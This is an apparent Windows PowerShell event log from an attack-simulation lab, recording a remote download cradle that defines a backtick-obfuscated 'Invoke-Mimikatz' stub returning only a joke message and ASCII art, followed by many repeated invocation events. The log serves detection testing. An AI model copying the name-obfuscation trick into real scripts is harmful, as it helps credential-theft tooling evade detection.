SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1472870
Keywords=None
Message=Creating Scriptblock text (1 of 1):
Write-Host "THIS CRADLE WORKED!!!" -NoNewLine -ForegroundColor Yellow
Write-Host " --" -NoNewLine -ForegroundColor White
Write-Host " SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION" -ForegroundColor Green

Function Inv`oke-Mimi`katz
{
Param(
	[Parameter(ParameterSetName = "DumpCreds", Position = 0)]
    [Switch]
	$DumpCreds
)

	#Write-Host "You shouldn't run Invoke-Mimikatz without express written consent from client." -ForegroundColor Yellow
	
	$MimikatzCoffeeAscii = "
    ( (
     ) )
  .______.
  |      |]
  \      /
   ``----'
	"

    $Results  = @()
    $Results += "You shouldn't run Invoke-Mimikatz without express written consent from client."
    $Results += $MimikatzCoffeeAscii
    $Results += "^ Mimikatz coffee ASCII art."
    $Results += "That Benjamin DELPY (@gentilkiwi) is a funny guy :)"
    $Results += "Normally creds will be here, but you get the picture."

    Return $Results
}

Write-Host "`nFunction" -NoNewLine -ForegroundColor White
Write-Host " Invoke-Mimikatz" -NoNewLine -ForegroundColor Green
Write-Host " (tutorial version strictly for lulz) has now been set." -ForegroundColor White
Write-Host "You can test it by running:" -NoNewLine -ForegroundColor White
Write-Host " Invoke-Mimikatz -DumpCreds" -NoNewLine -ForegroundColor Green
Write-host " (or" -NoNewLine -ForegroundColor White
Write-Host " -DumpCr" -NoNewLine -ForegroundColor Green
Write-Host " for short).`n" -ForegroundColor White

ScriptBlock ID: 89ebd1bb-8d1f-4a8b-aaa6-51de65f8ffff
Path:
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472869
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472868
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472867
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472866
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472865
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472864
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472863
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472862
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472861
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472860
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472859
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472858
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472857
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472856
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472855
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472854
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472853
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472852
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472851
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472850
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472849
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472848
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472847
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472846
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472845
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472844
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472843
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472842
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472841
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472840
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472839
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472838
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472837
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472836
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472835
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472834
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472833
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472832
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472831
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472830
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472829
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472828
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472827
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472826
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472825
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472824
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472823
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472822
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472821
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472820
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472819
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
